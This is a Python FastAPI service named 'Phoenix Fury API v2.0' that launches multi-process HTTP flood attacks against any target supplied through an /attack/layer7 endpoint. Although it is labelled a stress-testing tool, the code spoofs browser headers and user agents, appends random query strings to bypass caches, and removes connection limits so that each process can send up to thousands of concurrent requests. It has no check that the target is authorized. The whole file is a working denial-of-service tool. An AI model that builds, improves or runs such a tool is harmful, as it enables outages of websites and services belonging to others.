# ==================================================================================== # PHOENIX FURY API v2.0 - HIGH-RPS EDITION # # - RE-ARCHITECTED: Uses multiprocessing.Manager and shared memory counters # for near-zero overhead statistics, enabling massive RPS scaling. # - OPTIMIZED L7: Aggressive aiohttp connection pooling and a lean async # worker loop designed for maximum request throughput. # - SIMPLIFIED STATE: Centralized state management for instant status updates. # # *** BUILT FOR MAXIMUM L7 REQUESTS PER SECOND (RPS) *** # ==================================================================================== import socket import struct import random import time import multiprocessing import threading import asyncio import aiohttp import os import sys import psutil import uvloop from typing import Literal, Optional, List from ctypes import c_bool, c_ulonglong # FastAPI & Pydantic from fastapi import FastAPI, HTTPException, BackgroundTasks from pydantic import BaseModel, Field, validator import uvicorn # Apply uvloop for a faster asyncio event loop asyncio.set_event_loop_policy(uvloop.EventLoopPolicy()) # --- Application Setup & Constants --- app = FastAPI( title="🔥 Phoenix Fury API v2.0", description="A high-RPS, multi-process L4/L7 stress testing tool. Re-architected for maximum performance. Requires root/admin privileges for Layer 4 attacks.", version="2.0.0" ) CPU_COUNT = psutil.cpu_count(logical=True) STATS_BATCH_UPDATE_SIZE = 200 # How many requests a worker makes before updating the shared counter # --- Realistic Browser Headers --- USER_AGENTS = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0", ] HTTP_HEADERS = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "none", "Sec-Fetch-User": "?1", "TE": "trailers", } # ==================================================================================== # GLOBAL SHARED STATE (HIGH PERFORMANCE) # ==================================================================================== # Using a Manager is the cleanest way to share complex state between processes. # For raw performance, Value/Event are used for high-frequency updates. manager = multiprocessing.Manager() STATE = manager.dict() STOP_EVENT = multiprocessing.Event() TOTAL_SENT_COUNTER = multiprocessing.Value(c_ulonglong, 0) def reset_state(): """Resets the shared state to default values.""" STATE.clear() STATE.update({ "attack_running": False, "attack_type": "None", "target_host": "None", "target_ip": "None", "port": 0, "duration": 0, "start_time": 0.0, "processes": 0, "current_rate": 0.0, }) STOP_EVENT.clear() with TOTAL_SENT_COUNTER.get_lock(): TOTAL_SENT_COUNTER.value = 0 reset_state() # Initialize on startup # ==================================================================================== # Pydantic API Models # ==================================================================================== class L7Config(BaseModel): target: str = Field(..., description="Target hostname or IP address (e.g., http://example.com)") port: int = Field(..., ge=1, le=65535, description="Target port") duration: int = Field(..., ge=10, description="Attack duration in seconds") processes: int = Field(CPU_COUNT, ge=1, le=CPU_COUNT*4, description=f"Number of processes to spawn. Defaults to CPU cores ({CPU_COUNT}).") concurrency_per_process: int = Field(512, ge=1, le=4096, description="Concurrent async tasks per process.") method: Literal["get", "post", "head"] = Field("get", description="HTTP method.") path: str = Field("/", description="Request path") class StatusResponse(BaseModel): attack_running: bool attack_type: str target: str port: int duration: int elapsed_time: float processes: int total_requests_sent: int current_rate_rps: float cpu_usage_percent: float memory_usage_percent: float # ==================================================================================== # CORE UTILS & NETWORKING # ==================================================================================== def resolve_target(target: str) -> str: """Safely resolve hostname to IP.""" try: # Handle URLs like http://domain.com if "://" in target: target = target.split("://")[1].split("/")[0] return socket.gethostbyname(target) except socket.gaierror: raise HTTPException(status_code=400, detail=f"Could not resolve hostname: {target}") # ==================================================================================== # HIGH-PERFORMANCE L7 WORKER # ==================================================================================== async def l7_task(session, url, method, stop_event, shared_counter): """A single async task that hammers a URL in a loop.""" local_counter = 0 while not stop_event.is_set(): try: # Add a random query param to bypass caches request_url = f"{url}?{random.randint(1, 99999999)}" async with session.request(method, request_url, ssl=False): local_counter += 1 if local_counter >= STATS_BATCH_UPDATE_SIZE: with shared_counter.get_lock(): shared_counter.value += local_counter local_counter = 0 except Exception: # In a stress test, we expect errors. Count them as attempts. local_counter += 1 if local_counter >= STATS_BATCH_UPDATE_SIZE: with shared_counter.get_lock(): shared_counter.value += local_counter local_counter = 0 # Yield control to the event loop immediately await asyncio.sleep(0) # Final update before exiting if local_counter > 0: with shared_counter.get_lock(): shared_counter.value += local_counter async def l7_worker_main(url, method, concurrency, stop_event, shared_counter): """Main async function for a single worker process.""" headers = {**HTTP_HEADERS, "User-Agent": random.choice(USER_AGENTS)} # Aggressive connector settings for high RPS connector = aiohttp.TCPConnector( limit_per_host=0, # No limit on connections per host limit=None, # No limit on total connections force_close=False, # Reuse connections enable_keepalive=True, use_dns_cache=True, ttl_dns_cache=300, # Cache DNS for 5 mins ssl=False ) timeout = aiohttp.ClientTimeout(total=10, connect=5) async with aiohttp.ClientSession(connector=connector, headers=headers, timeout=timeout) as session: tasks = [ l7_task(session, url, method, stop_event, shared_counter) for _ in range(concurrency) ] await asyncio.gather(*tasks) def l7_worker_process(target_ip, port, path, method, concurrency, stop_event, shared_counter): """The entry point for each spawned L7 attack process.""" # Construct the base URL. aiohttp handles the Host header correctly. url = f"http://{target_ip}:{port}{path}" try: asyncio.run(l7_worker_main(url, method, concurrency, stop_event, shared_counter)) except KeyboardInterrupt: pass # Allow clean exit except Exception as e: print(f"[Process {os.getpid()}] Worker error: {e}", file=sys.stderr) # ==================================================================================== # ATTACK MANAGER & STATE CONTROLLER # ==================================================================================== active_processes: List[multiprocessing.Process] = [] def start_attack(config: L7Config): """Initiates the L7 attack.""" if STATE["attack_running"]: print("Attack start requested, but one is already running.") return try: target_ip = resolve_target(config.target) # --- Update Global State --- STATE["attack_running"] = True STATE["target_host"] = config.target STATE["target_ip"] = target_ip STATE["port"] = config.port STATE["duration"] = config.duration STATE["attack_type"] = f"L7-{config.method.upper()}" STATE["start_time"] = time.time() STATE["processes"] = config.processes print(f"🔥 Starting {STATE['attack_type']} attack on {STATE['target_host']}:{STATE['port']} for {STATE['duration']}s") # --- Spawn Worker Processes --- for _ in range(config.processes): p = multiprocessing.Process( target=l7_worker_process, args=( target_ip, config.port, config.path, config.method, config.concurrency_per_process, STOP_EVENT, TOTAL_SENT_COUNTER ) ) active_processes.append(p) p.start() # --- Schedule the stop --- main_thread = threading.Thread(target=timed_stop, args=(config.duration,)) main_thread.start() except Exception as e: print(f"Failed to start attack: {e}", file=sys.stderr) stop_attack_immediately() def timed_stop(duration: int): """Waits for the duration and then stops the attack.""" time.sleep(duration) print(f"Duration of {duration}s reached. Stopping attack.") stop_attack_immediately() def stop_attack_immediately(): """Stops the attack and cleans up resources.""" if not STATE["attack_running"]: return {"status": "success", "message": "No attack was running."} print("🛑 Sending stop signal to all worker processes...") STOP_EVENT.set() for p in active_processes: p.join(timeout=5) # Give processes time to exit cleanly if p.is_alive(): print(f"Process {p.pid} did not terminate gracefully, forcing termination.") p.terminate() active_processes.clear() elapsed = time.time() - STATE['start_time'] total_sent = TOTAL_SENT_COUNTER.value avg_rate = total_sent / elapsed if elapsed > 0 else 0 print("="*40) print("✅ ATTACK TERMINATED.") print(f" Total Requests: {total_sent:,}") print(f" Elapsed Time: {elapsed:.2f} seconds") print(f" Average Rate: {avg_rate:,.2f} RPS") print("="*40) reset_state() return {"status": "success", "message": "Attack stopped."} def stats_calculator(): """A background thread to calculate RPS continuously.""" last_check_time = time.time() last_count = 0 while True: time.sleep(1) if STATE["attack_running"]: now = time.time() current_count = TOTAL_SENT_COUNTER.value elapsed = now - last_check_time if elapsed > 0: rate = (current_count - last_count) / elapsed STATE["current_rate"] = rate last_check_time = now last_count = current_count else: if STATE["current_rate"] != 0: STATE["current_rate"] = 0 last_count = 0 # ==================================================================================== # FASTAPI ENDPOINTS # ==================================================================================== @app.on_event("startup") def on_startup(): """Start the background stats thread.""" reset_state() stats_thread = threading.Thread(target=stats_calculator, daemon=True) stats_thread.start() @app.post("/attack/layer7") def api_start_l7_attack(config: L7Config): if STATE["attack_running"]: raise HTTPException(status_code=409, detail="An attack is already in progress.") # We run the attack logic in a separate thread to not block the API response attack_thread = threading.Thread(target=start_attack, args=(config,)) attack_thread.start() return {"status": "success", "message": f"L7 {config.method.upper()} attack initiated on {config.target}:{config.port}"} @app.post("/attack/stop") def api_stop_attack(): if not STATE["attack_running"]: return {"status": "info", "message": "No attack is currently running."} response = stop_attack_immediately() return response @app.get("/status", response_model=StatusResponse) def get_status(): """Provides a real-time status of the ongoing attack.""" elapsed = (time.time() - STATE["start_time"]) if STATE["attack_running"] else 0 return StatusResponse( attack_running=STATE["attack_running"], attack_type=STATE["attack_type"], target=f"{STATE['target_host']} ({STATE['target_ip']})", port=STATE["port"], duration=STATE["duration"], elapsed_time=round(elapsed, 2), processes=STATE["processes"], total_requests_sent=TOTAL_SENT_COUNTER.value, current_rate_rps=round(STATE["current_rate"], 2), cpu_usage_percent=psutil.cpu_percent(), memory_usage_percent=psutil.virtual_memory().percent ) @app.get("/") def root(): return {"message": "🔥 Phoenix Fury API v2.0 - High-RPS Edition", "docs": "/docs"} # --- Main Execution --- if __name__ == "__main__": multiprocessing.freeze_support() print("Phoenix Fury API v2.0 starting up...") print(f"Detected {CPU_COUNT} logical CPU cores.") uvicorn.run(app, host="0.0.0.0", port=8000)